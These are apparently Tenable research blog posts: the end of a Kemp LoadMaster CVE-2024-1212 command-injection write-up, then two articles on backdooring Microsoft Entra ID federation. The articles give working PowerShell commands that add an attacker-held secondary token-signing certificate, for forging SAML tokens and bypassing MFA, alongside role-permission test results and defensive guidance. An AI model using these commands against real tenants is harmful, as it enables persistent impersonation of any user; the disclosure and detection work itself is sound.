First, we’ve copied the qemu-x86_64-static binary into our mounted filesystem. We’re using that with the -E flag to pass in a bunch of environment variables found via reversing access, one of which is the injectable REMOTE_USER. The whole thing is wrapped in chroot so that symbolic links and relative paths work correctly. We give /bin/access several flags which we’ve lifted straight from the CGI script that calls the binary

exec /bin/${0/*\//} -C $CLUST -F $FIPS -H $HW_VERSION

and from checking the ps debugging feature in the LoadMaster UI. Pro tip: check ps while running another longer running debug command like top or tcpdump in order to see better results.

root 13333 0.0 0.0 6736 1640 ? S 15:54 0:00 /sbin/httpd -port 8080 -address
root 16733 0.0 0.0 6736 112 ? S 15:59 0:00 /sbin/httpd -port 8080 -address
bal 16734 0.0 0.0 12064 2192 ? S 15:59 0:00 /bin/access -C 0 -F 0 -H 3
bal 16741 0.2 0.0 11452 2192 ? S 15:59 0:00 /usr/bin/top -d1 -n10 -b -o%CPU
bal 16845 0.0 0.0 7140 1828 ? R 15:59 0:00 ps auxwww

While this doesn’t provide us the complete method to exploit externally, it is a nice quick method to try out different injection strings and test assumptions. We can also pass a -g <port> parameter to qemu and then attach gdb to the process to get even closer to what’s happening.


This was a really cool find by Rhino Labs. Here I add one additional exploitation path and some additional ways to test for this vulnerability.

Tenable’s got you covered and can detect this vulnerability as part of your VM program with Tenable VM, Tenable SC, and Tenable Nessus. The direct check plugin for this vulnerability can be found at CVE-2024-1212. The plugin tests test both APIv1 and APIv2 paths for this command execution exposure.


Another Path to Exploiting CVE-2024-1212 in Progress Kemp LoadMaster was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Stealthy Persistence & PrivEsc in Entra ID by using the Federated Auth Secondary Token-signing Cert.

Exploiting Entra ID for Stealthier Persistence and Privilege Escalation using the Federated Authentication’s Secondary Token-signing Certificate


Microsoft Entra ID (formerly known as Azure AD) offers a feature called federation that allows you to delegate authentication to another Identity Provider (IdP), such as AD FS with on-prem Active Directory. When users log in, they will be redirected to the external IdP for authentication, before being redirected back to Entra ID who will then verify the successful authentication on the external IdP and the user’s identity. This trust is based on the user returning with a token that is signed by the external IdP so that Entra ID can verify that it was legitimately obtained (i.e. not forged) and that its content is correct (i.e. not tampered with) 🔐

The external IdP signs the token with a private key, which has an associated public key stored in a certificate. To make this work, you need to configure this certificate in Microsoft Entra ID, along with other configuration for the federated domain. It accepts two token-signing certificates in the configuration of a federated domain, and both are equally accepted as token signers! 💥 This is by design to allow for automatic certificate renewal near its expiry. However, it’s important to note that this second token-signing certificate may be overlooked by defenders and their security tools! 👀

In this post, I’ll show you where this certificate can be found and how attackers can add it (given the necessary privileges) and use it to forge malicious tokens. Finally, I will provide some recommendations for defense in light of this.

This was discovered by Tenable Research while working on identity security.


To learn more about federation and how attackers can exploit it to maintain or increase their privileges in an Entra tenant, please read my previous article ➡️ “Roles Allowing To Abuse Entra ID Federation for Persistence and Privilege Escalation”. Note that in this article I described that a malicious or compromised user, who is assigned any of the following built-in Entra roles (as of January 2024), has the power to change federation settings, including both token-signing certificates:

  • Global Administrator
  • Security Administrator
  • Hybrid Identity Administrator
  • External Identity Provider Administrator
  • Domain Name Administrator
  • Partner Tier2 Support

If the attacker gets their hands on a SAML token-signing certificate, for example by adding their own to the configuration as described in this post, they can forge arbitrary tokens that allow them to authenticate as anyone.

The corresponding MITRE ATT&CK techniques are:

Previous work

The technique of abusing federation was described by Mandiant in Remediation and hardening strategies for Microsoft 365 to defend against UNC2452 (2021):

The threat actor must first compromise an account with permission to modify or create federated realm objects.

These mentioned permissions are given by the roles previously listed. The main way is to modify the current token-signing certificate, stored in the “signingCertificate” attribute of the federation configuration. But this has the disadvantage of temporarily breaking the authentication and thus making the attack somewhat visible.

In the same (2021) paper, Mandiant also described a variant, where the attacker adds a secondary token-signing certificate instead of changing the main one:

A threat actor could also modify the federation settings for an existing domain by configuring a new, secondary, token-signing certificate. This would allow for an attack (similar to Golden SAML) where the threat actor controls a private key that can digitally sign SAML tokens and is trusted by Azure AD.

So while this article will not unveil anything new 😔, it does aim to shed more light on this lesser-known issue 😉

Interest for attackers

Do you wonder how this secondary token-signing certificate can be useful for attackers, and why should you care?

The first interest is that mature cyber organizations and security tools are already scanning and monitoring the primary token-signing certificate. So attackers may leverage this lesser-known secondary token-signing certificate for a stealthier attack.

Moreover, if an attacker replaces the normal primary token-signing certificate with their own, they will (temporarily) disrupt the authentication for regular users, which is not discreet! Using the secondary certificate instead does not have this breaking side effect and thus is stealthier. An alternative would be to register a new federated domain, but this rarely happens normally, so it might also raise alarms.

I believe this technique will become even more popular among attackers now that the latest version of AADInternals by Dr. Nestori Syynimaa, 0.9.3 published in January 2024, will automatically inject the backdoor certificate as a secondary token-signing certificate in case the domain is already federated:

Modified ConvertTo‑AADIntBackdoor to add backdoor certificate to NextSigningCertificate if the domain is already federated.

With this new knowledge we also understand why Microsoft recommends in their “Emergency rotation of the AD FS certificates” article to renew the token-signing certificate twice because:

You’re creating two certificates because Microsoft Entra ID holds on to information about the previous certificate. By creating a second one, you’re forcing Microsoft Entra ID to release information about the old certificate and replace it with information about the second one. If you don’t create the second certificate and update Microsoft Entra ID with it, it might be possible for the old token-signing certificate to authenticate users.

If you are an AD security veteran, it certainly reminds you of something, and you are right 😉 Such a Golden SAML attack against cloud Entra ID is similar to the famous Golden Ticket attack against on-prem AD, and it’s interesting to see the same remediation guidance, which is to renew twice the token-signing certificate/krbtgt respectively, and it’s for the same reason!

Attribute/argument to manage the secondary token-signing certificate

As described in my previous article, there are several APIs available to interact with Entra ID. In the following we will see how a secondary token-signing certificate can be injected using the 🟥 Provisioning API / MSOnline (MSOL, which will be deprecated this year (2024) ⚠️), then using the 🟩 Microsoft Graph API / Microsoft Graph PowerShell SDK. The colored squares 🟥🟩 are the same as in my previous article and they allow to visually distinguish both APIs.

When using the 🟩 MS Graph API, the configuration of a federated domain is returned as an internalDomainFederation object. The main certificate is in the signingCertificate attribute, and the second token-signing certificate is in the nextSigningCertificate attribute which is described as:

Fallback token signing certificate that can also be used to sign tokens, for example when the primary signing certificate expires. […] Much like the signingCertificate, the nextSigningCertificate property is used if a rollover is required outside of the auto-rollover update, a new federation service is being set up, or if the new token signing certificate isn’t present in the federation properties after the federation service certificate has been updated.

I helped Microsoft improve this description a little because the initial one, in my opinion, could be understood as if the second certificate were only usable during a rollover operation, whereas it can be used at any time simultaneously like the main certificate! I contacted MSRC first and they confirmed that it was working as intended.

When using the 🟥 Provisioning API (MSOnline), you can find arguments with the same names: -SigningCertificate and -NextSigningCertificate (proof that this secondary token-signing certificate has been here for a long time, i.e. it was not introduced recently with the MS Graph API).

Generate certificates

In the following examples, we will need two token-signing certificates that you can generate using these PowerShell commands:

$certStoreLocation = "cert:\CurrentUser\My"

$primary = New-SelfSignedCertificate -Subject "primary token-signing certificate" -CertStoreLocation $certStoreLocation -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter (Get-Date).AddDays(1)
$primary_certificate = [System.Convert]::ToBase64String($primary.GetRawCertData())
Get-ChildItem $($certStoreLocation + "\" + $primary.Thumbprint) | Remove-Item

$secondary = New-SelfSignedCertificate -Subject "secondary token-signing certificate" -CertStoreLocation $certStoreLocation -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter (Get-Date).AddDays(1)
$secondary_certificate = [System.Convert]::ToBase64String($secondary.GetRawCertData())
Get-ChildItem $($certStoreLocation + "\" + $secondary.Thumbprint) | Remove-Item

They delete the generated certificates because we only need their public part and not the private key for the demonstrations below, but of course, an attacker would keep the private key since it’s required to then generate forged tokens.

Convert a domain to federated including a secondary token-signing certificate

For each example below, the prerequisite is having a verified domain, but not yet converted to federated, and our goal is to convert it to federated with two certificates ⤵️

🟥 Provisioning API: using Set-MsolDomainAuthentication

Using Set-MsolDomainAuthentication:

Set-MsolDomainAuthentication `
-DomainName $domain `
-Authentication Federated `
-SigningCertificate $primary_cert `
-NextSigningCertificate $secondary_cert `
-IssuerUri "$('{0:X}' -f (Get-Date).GetHashCode())" -LogOffUri "" -PassiveLogOnUri ""

And we can check that we do indeed see both certificates:

PS> Get-MsolDomainFederationSettings -DomainName $domain | select SigningCertificate,NextSigningCertificate | Format-List

SigningCertificate : MIIDMjC[...]pfgoXj3kI
NextSigningCertificate : MIIDNjC[...]KQEixdg==

🟩 MS Graph API: using New-MgDomainFederationConfiguration

Using New-MgDomainFederationConfiguration:

New-MgDomainFederationConfiguration `
-DomainId $domain `
-FederatedIdpMfaBehavior "acceptIfMfaDoneByFederatedIdp" `
-SigningCertificate $primary_cert `
-NextSigningCertificate $secondary_cert `
-IssuerUri "$('{0:X}' -f (Get-Date).GetHashCode())" -SignOutUri "" -PassiveSignInUri ""

And we can check that we do indeed see both certificates:

PS> Get-MgDomainFederationConfiguration -DomainId $domain | select SigningCertificate,NextSigningCertificate | Format-List

SigningCertificate : MIIDMjC[...]pfgoXj3kI
NextSigningCertificate : MIIDNjC[...]KQEixdg==

Add a secondary token-signing certificate to an existing federated domain

For each example below, the prerequisite is having an already federated domain, but with just a primary token-signing certificate, and our goal is to add a secondary one ⤵️

🟥 Provisioning API: using Set-MsolDomainFederationSettings

First, check that it’s indeed a federated domain with just a primary token-signing certificate:

PS> Get-MsolDomainFederationSettings -DomainName $domain | select SigningCertificate,NextSigningCertificate | Format-List

SigningCertificate : MIIDMjC[...]pfgoXj3kI
NextSigningCertificate :

Then, add a secondary certificate using Set-MsolDomainFederationSettings:

Set-MsolDomainFederationSettings `
-DomainName $domain `
-NextSigningCertificate $secondary_cert

Finally, we can check now that we do indeed see both certificates:

PS> Get-MsolDomainFederationSettings -DomainName $domain | select SigningCertificate,NextSigningCertificate | Format-List

SigningCertificate : MIIDMjC[...]pfgoXj3kI
NextSigningCertificate : MIIDNjC[...]KQEixdg==

🟥 Provisioning API: using AADInternals’ ConvertTo-AADIntBackdoor

Ensure we have the latest version of AADInternals (>= v0.9.3):

PS> Import-Module AADInternals
v0.9.3 by @DrAzureAD (Nestori Syynimaa)

Using ConvertTo-AADIntBackdoor:

ConvertTo-AADIntBackdoor `
-DomainName $domain `
-AccessToken $at `

The verbose output is clear enough:

VERBOSE: Domain is Federated, modifying NextTokenSigningCertificate

And we can check again that we do indeed see both certificates:

PS> Get-MsolDomainFederationSettings -DomainName $domain | select SigningCertificate,NextSigningCertificate | Format-List

SigningCertificate : MIIDMjC[...]pfgoXj3kI
NextSigningCertificate : MIIDNjC[...]KQEixdg==

🟩 MS Graph API: using Update-MgDomainFederationConfiguration

Using Update-MgDomainFederationConfiguration:

$fedconf = Get-MgDomainFederationConfiguration -DomainId $domain
Update-MgDomainFederationConfiguration `
-DomainId $domain `
-InternalDomainFederationId $fedconf.Id `
-NextSigningCertificate $secondary_cert

And we can check that we do indeed see both certificates:

PS> Get-MgDomainFederationConfiguration -DomainId $domain | select SigningCertificate,NextSigningCertificate | Format-List

SigningCertificate : MIIDMjC[...]pfgoXj3kI
NextSigningCertificate : MIIDNjC[...]KQEixdg==

Proof that both token-signing certificates work simultaneously

Since the beginning I’ve been telling you that both token-signing certificates are accepted as signers, even if the primary is not expired, but I owe you a proof after all! In the following example, I create two different certificates as described previously and extract their private keys. Then I convert the domain to federated with both token-signing certificates configured, which you can see in the output at the bottom. Finally, I successfully authenticate with a ticket forged with each token-signing certificate private key using Open-AADIntOffice365Portal (to make it work, I had to fix an unrelated bug brought in v.0.9.3 of AADInternals):

Recommendations for defense

The main recommendations are the same as in my previous article.

🤔 Be careful about assigning the Entra roles that allow changing federation configuration, thereby adding a secondary token-signing certificate:

  • Global Administrator
  • Security Administrator
  • Hybrid Identity Administrator
  • External Identity Provider Administrator
  • Domain Name Administrator
  • Partner Tier2 Support

🔍 Audit and monitor the configuration of your federated domain(s) to detect the potential already existing, or future, backdoors. Here is a PowerShell oneliner to list your federated domains and their configured SigningCertificate/NextSigningCertificate:

Get-MgDomain | Where-Object { $_.AuthenticationType -eq "Federated" } | ForEach-Object { $_ ; Get-MgDomainFederationConfiguration -DomainId $_.Id | select SigningCertificate,NextSigningCertificate }

🆘 Seek assistance from Incident Response specialists with expertise on Entra ID in case of suspicion

😑 Migrating away from federated authentication (i.e. decommissioning AD FS), has many advantages and is recommended by Microsoft, but it does not protect against this. It only makes it easier to detect it because any new “federated” domain, or any change in “federation” settings, should raise an alert 🚨

🚨 On the subject of monitoring, you can “Monitor changes to federation configuration in your Microsoft Entra ID” as recommended by Microsoft. Which is made easier if your organization doesn’t use (anymore) federation (as written above). But unfortunately the “Set federation settings on domain” AuditLogs event doesn’t contain the information allowing you to determine if the modification affected the token-signing certificates, and even if it did, there are no details on the certificates themselves as you can see:

🙈 Finally, since this secondary token-signing certificate can be a blind spot, ensure that your security tools can monitor and scan both certificates for anomalies. Tenable Identity Exposure has several Indicators of Exposure (IoEs) related to federation (“Known Federated Domain Backdoor”, “Federation Signing Certificates Mismatch”, and more to come!), and of course we designed them so they cover both certificates 😉

Stealthy Persistence & PrivEsc in Entra ID by using the Federated Auth Secondary Token-signing Cert. was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Entra Roles Allowing To Abuse Entra ID Federation for Persistence and Privilege Escalation


Microsoft Entra ID (formerly known as Azure AD) allows delegation of authentication to another identity provider through the legitimate federation feature. However, attackers with elevated privileges can abuse this feature, leading to persistence and privilege escalation 💥.

But what are exactly these “elevated privileges” that are required to do so? 🤔 In this article, we are going to see that the famous “Global Administrator” role is not the only one allowing it! 😉 Follow along (or skip to the conclusion!) to learn which of your Entra administrators have this power, since these are the ones that you must protect first.

This was discovered by Tenable Research while working on identity security.


By default, users submit their credentials to Entra ID (usually on the domain) which is in charge of validating them, either on its own if it’s a cloud-only account, or helped by the on-premises Active Directory (using hashes of AD password hashes already synchronized from AD via password hash sync, or by sending the password to AD for verification via pass-through authentication).

But there is another option: a Microsoft Entra tenant can use federation with a custom domain to establish trust with another domain for authentication and authorization. Organizations mainly use federation to delegate authentication for Active Directory users to their on-premises Active Directory Federation Services (AD FS). This is similar to the concept of “trust” in Active Directory. ⚠️ However, do not confuse the “custom domain” with an Active Directory “domain”!

When a user types their email on the login page, Entra ID detects when the domain is federated and then redirects the user to the URL of the corresponding Identity Provider (IdP), which obtains and verifies the user’s credentials, before redirecting the user to Entra ID with their proof (or failure) of authentication in the form of a signed SAML or WS-Federation (“WS-Fed” for short) token.

🏴‍☠️ However, if malicious actors gain elevated privileges in Microsoft Entra ID, they can abuse this federation mechanism to create a backdoor by creating a federated domain, or modifying an existing one, allowing them to impersonate anyone, even bypassing MFA.

The potential for abuse of this legitimate feature was initially discovered by Dr. Nestori Syynimaa: “Security vulnerability in Azure AD & Office 365 identity federation”, where he described how it concerns even cloud-only users, and even allows bypassing MFA, and further described it in “How to create a backdoor to Azure AD — part 1: Identity federation”. If you are curious, he also shared a “Deep-dive to Azure Active Directory Identity Federation”. He also hosts an OSINT tool allowing to list the domains, including if they are federated (to which IdP), of any tenant without even having to be authenticated to it!

This technique is currently used by threat actors, such as reported by Microsoft Incident Response on October 2023 in “Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction”:

Octo Tempest targets federated identity providers using tools like AADInternals to federate existing domains, or spoof legitimate domains by adding and then federating new domains. The threat actor then abuses this federation to generate forged valid security assertion markup language (SAML) tokens for any user of the target tenant with claims that have MFA satisfied, a technique known as Golden SAML

I also wrote an article describing how attackers can exploit the federated authentication’s secondary token-signing certificate for stealthier persistence and privilege escalation.

The corresponding MITRE ATT&CK techniques are:

🛡️ You will find recommendations to defend against this at the end of this article.

This federation feature for internal users (aka “members”) must not be confused with another federation feature in Entra ID, meant for guests (aka “external identities”) which allows “Federation with SAML/WS-Fed identity providers for guest users” using configurable “Identity Providers for External Identities”. This research and article are focused on the former: internal federation.

APIs available to interact with Entra ID

Performing this attack requires interacting with Entra ID of course, which is done through APIs. There are several available, offering more or less the same features, as described by Dr. Nestori Syynimaa in his talk “AADInternals: How did I built the ultimate Azure AD hacking tool from the scratch”. However, we will see that sometimes, an action that is forbidden for a certain role by one API is allowed by another! 😨 The behavior of some actions is also different between the APIs, while some actions are only possible with older APIs.

I prefer mentioning the APIs instead of the admin (i.e. PowerShell) or hack tools that I used, since it is what actually matters whether the tool calling them.

🟥 Provisioning API / MSOnline (MSOL)

The MSOnline V1 PowerShell module is going to be ⚠️ deprecated soon in March 2024 but it is still working, so it remains available to attackers too. You can recognize its usage because all the cmdlets contain “Msol”, for example “Get-MsolUser”.

It relies on an API unofficially called the “provisioning API” available at the “” address. This API is not publicly documented and it uses the SOAP protocol.

It was replaced by the Azure AD Graph API (see below).

🟦 Azure AD Graph API

Likewise, the AzureAD PowerShell module is going to be ⚠️ deprecated soon in March 2024 but it is still working, so it remains available to attackers too. You can recognize its usage because all the cmdlets contain “AzureAD”, for example “Get-AzureADUser”.

It relies on an API called the Azure AD Graph API available on This API is publicly documented and it exposes REST endpoints.

It was replaced by the Microsoft Graph API (see below), with which it must not be confused.

🟩 Microsoft Graph API / Microsoft Graph PowerShell SDK

Microsoft Graph is the newest API offered, and currently recommended, by Microsoft to interact with Entra ID and other Microsoft cloud services (e.g. Microsoft 365). The API is available on It is publicly documented and it exposes REST endpoints.

There are also several SDKs offered to interact with it, including the Microsoft Graph PowerShell SDK. You can recognize its usage because all the cmdlets contain “Mg”, for example “Get-MgUser”.

Entra roles and permissions

Entra ID follows the RBAC model to declare who can do what. Principals (user, group, service principal) are assigned Roles on some Scope (entire tenant, or specific Administrative Unit, or even a single object). Each Entra Role is defined by the Entra Permissions (also called “actions” in Microsoft documentation) it gives.

⚠️ Do not confuse Entra RBAC, using Entra roles and meant to control access to Entra ID resources (users, groups, devices, IdP configuration, etc.), with Azure RBAC, using Azure roles and meant to control access to Azure cloud resources (virtual machines, databases, network, storage accounts, websites, etc.). Take the time to read this article if you have doubts: “Azure roles, Microsoft Entra roles, and classic subscription administrator roles”.

⚠️ Do not confuse Entra permissions (like “”) with the Entra API permissions (like the famous “Directory.ReadWrite.All” permission of MS Graph API).

There are around 100 Entra built-in roles (as of December 2023), the most famous and powerful being Global Administrator. Customers can create their own Entra custom roles containing exactly the permissions they want (but only some are supported).

My goal in this article is to identify exactly which Entra roles, and hopefully exact Entra permission(s), allow attackers to abuse the federation feature for malicious purposes.

After a quick review of the Entra roles recommended by the documentation to configure this feature, and the list of all available Entra permissions (in particular those under “”), I have selected for my tests these roles listed with their relevant permissions. The “[💥privileged]” tag below marks privileged roles according to Microsoft (as of November 2023), thanks to the recent feature “Privileged roles and permissions in Microsoft Entra ID”. Notably, none of these permissions is considered privileged.

Global Administrator [💥privileged]


Security Administrator [💥privileged]


Hybrid Identity Administrator [💥privileged]: according to its description, this role is meant to manage federation for internal users (among other features), which is the feature I’m focusing on


External Identity Provider Administrator: according to its description, this role is meant to manage federation for external users, which is not what this is about, but we never know… so I have included it


Domain Name Administrator


Partner Tier1 Support [💥privileged]: Microsoft has been saying for months that this role should not be used since it is deprecated, and its mentions have been recently removed from the documentation, but since it is still functioning (as of November 2023) and thus abusable by attackers, I have decided to include it

  • <none>

Partner Tier2 Support [💥privileged]: Microsoft has been saying for months that this role should not be used since it is deprecated, and its mentions have been recently removed from the documentation, but since it is still functioning (as of November 2023) and thus abusable by attackers, I have decided to include it



I used a single Entra tenant, with several Entra users: one user per role I wanted to test (with the role assigned of course).

I wrote several PowerShell scripts, which clean the environment if needed (to allow several consecutive runs), call the cmdlets corresponding to the API to test, and then check the result. That way I obtained reliable and reproducible test cases.

The scripts are publicly available on GitHub:

Steps of the killchain

Create and verify domain

Federation needs a custom domain name configured in Entra ID to work. You can list them in the Entra admin center (or Azure Portal):

Domains can either be:

  • “Managed”, by default. No check in the “Federated” column in the screenshot above.
    Users submit their credentials to Entra ID.
  • “Federated”, when federation is enabled on a domain. Check in the “Federated” column.
    Users are redirected to the federated IdP to which they submit their credentials and Entra ID trusts the token it emits.

Administrators can convert a domain between each of these modes.

Now, from an attacker’s perspective, if there is no custom domain available (apart from the default <tenant>, we have to create one and verify it to prove that we own it. These are two steps, using different API endpoints / PowerShell cmdlets.

Creating a new domain is at the same time more visible, due to the added domain, but also less visible since this new domain will only be used by the attacker and it will not disrupt the existing authentication process for normal users, as hinted by Mandiant:

Note: To not interrupt production and authentication with an existing federated domain (and to remain undetected), an attacker may opt to register a new domain with the tenant.

🟥 Provisioning API: using New-MsolDomain and Confirm-MsolDomain

Attempts were:

✅ allowed for:

  • Global Administrator
  • Partner Tier2 Support

❌ denied for these, with this error message right from the first creation step “Access Denied. You do not have permissions to call this cmdlet”

  • Security Administrator
  • Hybrid Identity Administrator
  • External Identity Provider Administrator
  • Domain Name Administrator
  • Partner Tier1 Support

🟦 Azure AD Graph API: using New-AzureADDomain and Confirm-AzureADDomain

API endpoints: create a domain and verify action

Attempts were:

✅ allowed for:

  • Global Administrator
  • Domain Name Administrator
  • Partner Tier2 Support

❌ denied for these, with this error message right from the first creation step “Insufficient privileges to complete the operation.”

  • Security Administrator
  • Hybrid Identity Administrator
  • External Identity Provider Administrator
  • Partner Tier1 Support

I noticed that contrary to the provisioning API, the Domain Name Administrator role is allowed to create and verify a domain with the MS Graph API.

🟩 MS Graph API: using New-MgDomain and Confirm-MgDomain

API endpoints: create domain and verify domain

Attempts were:

✅ allowed for:

  • Global Administrator
  • Domain Name Administrator
  • Partner Tier2 Support

❌ denied for these, with this error message right from the first creation step “Insufficient privileges to complete the operation.”

  • Security Administrator
  • Hybrid Identity Administrator
  • External Identity Provider Administrator
  • Partner Tier1 Support

So, exactly the same results as with Azure AD Graph just above.

Convert domain to federated mode / add federation configuration

The next step is to convert the target custom domain to Federated mode, either:

  • the custom domain was already present, but configured in the default Managed mode. ⚠️ converting it to Federated mode will cause disruptions to users who normally use this domain for authentication!
  • the attacker was able to create and verify a new domain as described just above

Converting the domain to federated requires providing federation configuration information. Indeed, federation requires some configuration on Entra ID-side, for instance the certificate used by the federated IdP to sign the token which is the authentication proof, and the IssuerUri that uniquely identifies a federation service allowing to identify to which domain the token is linked.

This technique was described by Mandiant:

This can be obtained by converting a managed domain to a federated domain
The threat actor must first compromise an account with permission to modify or create federated realm objects […] Mandiant observed connections to a Microsoft 365 tenant with MSOnline PowerShell followed by the configuration of a new, attacker-controlled domain as federated

And also by Dr. Nestori Syynimaa in “How to create a backdoor to Azure AD — part 1: Identity federation”.

🟥 Provisioning API: using Set-MsolDomainAuthentication or AADInternals’ ConvertTo-AADIntBackdoor

Attempts were:

✅ allowed for:

  • Global Administrator
  • Partner Tier2 Support

❌ denied for these, with this error message “Access Denied. You do not have permissions to call this cmdlet”

  • Security Administrator
  • Hybrid Identity Administrator
  • External Identity Provider Administrator
  • Domain Name Administrator
  • Partner Tier1 Support

🟦 Azure AD Graph API: not supported

I did not find any Azure AD Graph API endpoint, nor AzureAD PowerShell cmdlet, for converting a domain to federated.

🟩 MS Graph API: using New-MgDomainFederationConfiguration

API endpoint: Create internalDomainFederation

Attempts were:

✅ allowed for:

  • Global Administrator
  • Security Administrator
  • External Identity Provider Administrator
  • Domain Name Administrator
  • Partner Tier2 Support

❌ denied for these, with this error message right from the first creation step “Insufficient privileges to complete the operation.”

  • Hybrid Identity Administrator
  • Partner Tier1 Support

Once again, I noticed differences between the roles allowed by the provisioning API and the MS Graph API.

Thanks to this observation, I suggested an update in the official Entra ID doc page.

Add second federation configuration

While looking at the APIs, I noticed that it was possible to List internalDomainFederations, notice the plural, and that it returned a collection (array). So I had the idea of trying to add a second federation configuration to an existing domain!

Unfortunately, it failed with this error “Domain already has Federation Configuration set.” and indeed the doc could have given me a hint: “This API returns only one object in the collection […] collection of one internalDomainFederation object in the response body.”

Change existing federation configuration

Another way for attackers is to change the federation configuration of an existing federated domain to allow crafting tokens with the attacker’s own token-signing certificate. This is similar to a Golden SAML attack but instead of stealing the key, the attacker is inserting theirs, and instead of presenting the forged token to a service, they present it to the IdP.

This technique was described by Mandiant in Remediation and hardening strategies for Microsoft 365 to defend against UNC2452 (2021):

The threat actor must first compromise an account with permission to modify or create federated realm objects.

The main way is to modify the current token-signing certificate, stored in the “signingCertificate” attribute of the federation configuration, which has the disadvantage of temporarily breaking the authentication and thus making it noticeable.

A variant is also possible, where instead of changing the main token-signing certificate, the attacker adds a secondary token-signing certificate thanks to the “nextSigningCertificate” attribute. This variant was described by Mandiant in Remediation and hardening strategies for Microsoft 365 to defend against UNC2452 (2021):

A threat actor could also modify the federation settings for an existing domain by configuring a new, secondary, token-signing certificate. This would allow for an attack (similar to Golden SAML) where the threat actor controls a private key that can digitally sign SAML tokens and is trusted by Azure AD.

This secondary token-signing certificate was meant to prepare a rollover operation when the main one expires. However, both are accepted as token signers even when the first one has not expired yet. Microsoft Security (MSRC) has confirmed to me it was an intended behavior and working as expected. Therefore, I updated the public documentation:

nextSigningCertificate: Fallback token signing certificate that can also be used to sign tokens

This is also the reason why Microsoft recommends in their “Emergency rotation of the AD FS certificates” article to renew twice the token-signing certificate because:

You’re creating two certificates because Azure [Entra ID] holds on to information about the previous certificate. By creating a second one, you’re forcing Azure [Entra ID] to release information about the old certificate and replace it with information about the second one. If you don’t create the second certificate and update Azure [Entra ID] with it, it might be possible for the old token-signing certificate to authenticate users.

🟥 Provisioning API: using Set-MsolDomainFederationSettings

Attempts were:

✅ allowed for:

  • Global Administrator
  • Hybrid Identity Administrator
  • Partner Tier2 Support

❌ denied for these, with this error message right from the first creation step “Insufficient privileges to complete the operation.”

  • Domain Name Administrator
  • External Identity Provider Administrator
  • Security Administrator
  • Partner Tier1 Support

I noticed a difference here, with Set-MsolDomainAuthentication shown above, in that the “Hybrid Identity Administrator” role is now allowed.

🟦 Azure AD Graph API: not supported

I did not find any Azure AD Graph API endpoint, nor AzureAD PowerShell cmdlet, for modifying federation configuration. In the AzureADPreview module, there is the “New-AzureADExternalDomainFederation” cmdlet but it deals with federation for external users, not for internal users (as described at the beginning) which is the one I needed.

🟩 MS Graph API: using Update-MgDomainFederationConfiguration

API endpoint: Update internalDomainFederation

Attempts were:

✅ allowed for:

  • Global Administrator
  • Security Administrator
  • External Identity Provider Administrator
  • Domain Name Administrator
  • Partner Tier2 Support

❌ denied for these, with this error message right from the first creation step “Insufficient privileges to complete the operation.”

  • Hybrid Identity Administrator
  • Partner Tier1 Support

So, exactly the same results as for creating a federated domain with New-MgDomainFederationConfiguration shown above.

Remarks on inconsistency

🔍 I have no clue how Entra roles and permissions are implemented, nor used, by Entra ID but I noticed something strange. I feel like some operations are explicitly allowed to some roles instead of based on the exact permissions they contain. For example, while Security Administrator and Hybrid Identity Administrator contain exactly the same 3 permissions under “*”, the former is allowed to Create internalDomainFederation with the Graph API (using New-MgDomainFederationConfiguration) whereas the latter is not.

Similarly, while Domain Name Administrator and Partner Tier2 Support both contain the “” permission, the former is forbidden to call Set-MsolDomainAuthentication while the latter is allowed.

🤔 I also noticed that some roles were forbidden to do some of the mentioned operations by the old 🟥 Provisioning API (MSOL) while the newer 🟦 Azure AD Graph and 🟩 MS Graph APIs allow it, and the contrary too.

Full chain

So, in summary, if you remember the goal of this article 😉, what are the roles actually required to perform this attack end-to-end?

If a verified custom domain is not already present, the attacker will need to be assigned either:

  • Global Administrator
  • Domain Name Administrator
  • Partner Tier2 Support

However, if a verified custom domain is already present, the attacker will need to be assigned either:

  • Global Administrator
  • Security Administrator
  • Hybrid Identity Administrator
  • External Identity Provider Administrator
  • Domain Name Administrator
  • Partner Tier2 Support

😨 As you can see, Global Administrator is far from being the only role allowing to compromise Entra ID by abusing the federation feature! In my opinion, the most dangerous roles in these lists are “External Identity Provider Administrator” and “Domain Name Administrator” because they are not identified as 💥privileged by Microsoft, and thus, are subject to less scrutiny and security efforts.

I believe that it comes from the fact that none of the Entra permissions that seem related to domains and federation configuration are identified as privileged by Microsoft. I wish I could have identified the exact Entra permission(s) allowing this, by testing them one by one in an Entra custom role, but unfortunately only a subset of permissions is currently supported in custom roles and none are in this subset.

I contacted MSRC (VULN-113566) suggesting to mark these permissions, “” and “”, as privileged but they will not be doing it as they consider their baseline is correct even though some customers may have different interpretations.

You can also notice that an already existing custom domain is useful to attackers since it allows them to skip the domain creation and verification steps, which is stealthier, and makes the attack possible with more roles. However, it causes temporary disruptions for users who normally authenticate via the abused domain, so it is also less stealthy.

Recommendations for defense

The goal of this article was not to make you discover how federation itself can be abused, since great researchers have already done this a year ago, but still, you may wonder how to defend against such an attack.

Microsoft has long recommended to migrate away from federated authentication to managed authentication, however as we saw, even if an organization is not using (anymore) federated authentication, an attacker could still re-enable it.

🤔 First of all, apply the principle of least privilege and be mindful of whom you assign the roles mentioned previously (that was the goal of this article, do you remember? 😅). I hope I have convinced you that Global Administrator is not the only sensitive role.

🔍 Second, you should audit and monitor the federated domains (including their federation configuration(s)) in your Entra ID to detect the potential backdoors (already present, or to be added). Especially if your organization is not using (anymore) federated authentication. One of the available solutions is of course Tenable Identity Exposure which offers Indicators of Exposure dedicated to this subject (“Known Federated Domain Backdoor”, “Federation Signing Certificates Mismatch”, and more to come!). Microsoft has also published a guide describing how to “Monitor changes to federation configuration in your Microsoft Entra ID” but which leaves up to you the analysis of the federation configuration when an event occurs. Changes in federated domains, and the associated federation configurations, are normally rare so any event should be properly investigated.

🆘 Third, in case of a suspected or confirmed attack, it is highly recommended to seek assistance from incident response specialists with expertise on Entra ID to help identify the extent of the attack including the other potential means of persistence of the attacker. You can follow this remediation guide from Microsoft “Emergency rotation of the AD FS certificates”.


